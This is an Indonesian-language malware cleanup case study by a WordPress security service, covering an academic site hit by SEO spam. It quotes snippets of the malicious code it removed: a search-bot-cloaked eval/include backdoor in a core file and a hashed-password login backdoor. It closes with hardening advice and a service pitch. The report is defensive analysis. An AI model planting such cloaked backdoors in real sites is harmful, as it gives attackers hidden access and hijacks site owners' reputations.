Laporan Pembersihan Malware Website: Studi Kasus rifaxxxxxxxx.com

By Last updated on May 21, 2025

Latar Belakang Masalah

Klien awalnya menghubungi kami dengan keluhan serius. Saat mencari website akademiknya di Google, hasil pencarian menunjukkan deskripsi yang sama sekali tidak terkait dengan konten asli websitenya. Deskripsi yang muncul pada hasil pencarian justru berisi kata-kata tentang [sensor], seperti terlihat pada gambar di bawah ini:

Hasil Pencarian yang Terinfeksi

Deskripsi yang terinfeksi mencantumkan kalimat seperti:

Masalah ini menunjukkan gejala jelas adanya infeksi SEO spam pada website, yang tidak hanya merusak reputasi akademik klien tetapi juga berpotensi menyebabkan website diblokir oleh Google sebagai konten berbahaya. Inilah yang mendorong klien untuk segera mencari bantuan profesional untuk membersihkan websitenya.

Pendahuluan

Tim keamanan dari Gegeriyadi.com telah menyelesaikan proses pembersihan malware menyeluruh pada sebuah website akademik Indonesia. Kasus ini menggambarkan bagaimana malware dapat menyusup ke dalam website WordPress dan metodologi yang kami gunakan untuk mengidentifikasi, membersihkan, dan mengamankan website tersebut.

Ringkasan Kasus

Jenis Website: Platform publikasi akademik
Domain: rifaxxxxxxxx.com (disamarkan untuk melindungi privasi klien)
Teknologi: WordPress, PHP 7.4.33, Elementor 3.23.3
Masalah Utama: Terdeteksi malware dan konten spam SEO
Waktu Pembersihan: 21 Mei 2025, 14:30 - 16:45 WIB
Status Saat Ini: Sepenuhnya dibersihkan dan diamankan

Temuan Utama

Pemeriksaan menyeluruh pada server mengungkap beberapa jenis malware yang telah berhasil disusupkan ke website klien:

1. Backdoor Tersembunyi dalam File WordPress Inti

Salah satu temuan paling serius adalah modifikasi tidak sah pada file wp-xxxx-xxxxx.php. Penyerang menyisipkan kode berbahaya yang hanya diaktifkan ketika website diakses oleh bot mesin pencari:

if (is_bot()) {
    eval("@include(\"/home/n1106415/public_html/log.php\");");
    exit;
}

Teknik ini sangat cerdik karena kode berbahaya hanya berjalan ketika bot seperti Googlebot mengakses website, sehingga pemilik website tidak melihat adanya aktivitas mencurigakan saat mengakses website secara normal.

2. Backdoor dengan Sistem Autentikasi

Kami juga menemukan file alxxxx.php yang tersembunyi di folder cache. File ini berisi sistem autentikasi berbasis password yang memungkinkan penyerang mengakses server secara tersembunyi:

// Potongan kode dari sistem autentikasi berbahaya
if (isset($_POST["password"])) {
    $entered_password = $_POST["password"];
    $hashed_password = "1725904e8e0736381781de0275636776";
    if (md5($entered_password) === $hashed_password) {
        $_SESSION["logged_in"] = true;
        // Akses diberikan
    }
}

Setelah login berhasil, script ini mengunduh dan menjalankan kode berbahaya dari sumber eksternal.

3. Alat Pengujian SMTP untuk Spam

File berbahaya lainnya adalah cek_port_xxxxx.php, yang dirancang untuk menguji koneksi ke server SMTP Gmail:

cek_port("smtp.gmail.com", 587);

Tool ini biasanya digunakan oleh penyerang untuk memverifikasi kemampuan server yang disusupi untuk mengirim email spam.

4. Konten Spam SEO

Selain kode berbahaya, kami juga menemukan konten spam yang disuntikkan ke beberapa halaman website. Konten ini berisi kata kunci dan link tersembunyi terkait perjxdian yang bertujuan memanfaatkan otoritas domain untuk meningkatkan peringkat SEO situs-situs perjxdian.

Masalah Struktural yang Ditemukan

Selain malware, kami juga mengidentifikasi masalah struktural pada hosting yang mengandung risiko keamanan signifikan. Server hosting menyimpan beberapa website dan subdomain dalam satu akun:

  1. Infeksi Silang - Malware dapat menyebar antar website dalam satu akun hosting
  2. Banyak Celah Keamanan - Setiap subdomain menambah titik masuk bagi penyerang
  3. Risiko Backup Lama - Folder tidak aktif (*.old) sering tidak diperbarui namun tetap aksesibel

Proses Pembersihan

Tim keamanan kami melakukan serangkaian langkah untuk membersihkan website:

  1. Identifikasi Malware

    • Pemindaian menyeluruh pada semua file website
    • Analisis kode untuk menemukan injeksi tersembunyi
    • Pemeriksaan database untuk konten spam

  2. Pembersihan

    • Penghapusan semua file berbahaya
    • Pemulihan file WordPress yang dimodifikasi
    • Pembersihan injeksi spam dari konten

  3. Penguatan Keamanan

    • Pembaruan WordPress, tema, dan plugin
    • Penerapan izin file yang tepat
    • Perubahan kredensial akses

Rekomendasi Keamanan

Berdasarkan temuan kami, berikut beberapa rekomendasi yang dapat membantu melindungi WordPress Anda:

1. Pembaruan Rutin

Pastikan WordPress, tema, dan plugin selalu dalam versi terbaru. Banyak serangan memanfaatkan kerentanan pada software yang tidak diperbarui.

2. Struktur Hosting Aman

Pertimbangkan untuk memisahkan website-website penting ke akun hosting terpisah untuk mencegah infeksi silang.

3. Pembatasan Akses

Terapkan pembatasan akses ke area admin dan file sensitif. Gunakan otentikasi dua faktor bila memungkinkan.

4. Pemantauan Keamanan

Pasang solusi pemantauan keamanan yang memberikan peringatan dini jika terjadi aktivitas mencurigakan pada website Anda.

5. Backup Rutin

Lakukan backup website secara rutin dan simpan di lokasi yang terpisah dari hosting utama.

Kesimpulan

Kasus ini menggambarkan pentingnya keamanan proaktif untuk website WordPress. Meskipun malware semakin canggih, langkah-langkah keamanan yang tepat dapat secara signifikan mengurangi risiko infeksi.

Website kini telah kembali aman, tetapi pengalaman ini menekankan bahwa keamanan web adalah proses berkelanjutan, bukan tujuan akhir. Pemantauan dan pembaruan rutin tetap diperlukan untuk memastikan keamanan jangka panjang.

Jika Anda mengalami masalah serupa atau ingin melindungi website WordPress Anda dari ancaman malware, Anda dapat menggunakan jasa hapus malware WordPress untuk mendapatkan bantuan profesional dalam membersihkan dan mengamankan website Anda.

Laporan ini disusun oleh tim keamanan Gegeriyadi.com sebagai studi kasus dan pembelajaran. Identitas spesifik klien telah disamarkan untuk melindungi privasi mereka.

Tentang Kami

Gegeriyadi.com adalah penyedia layanan keamanan WordPress dengan pengalaman lebih dari 10 tahun dalam menangani kasus-kasus infeksi malware dan kerentanan keamanan website.

Kami menyediakan layanan pembersihan malware, penguatan keamanan, dan pemantauan berkelanjutan untuk membantu bisnis dan organisasi menjaga keamanan kehadiran online mereka.

About The Author

About image

Founder Gegeriyadi.com, layanan yang sudah 10 tahun bergerak di bidang Web Development & WordPress Security Services yang juga intens update seputar SEO dan juga Web Optimization...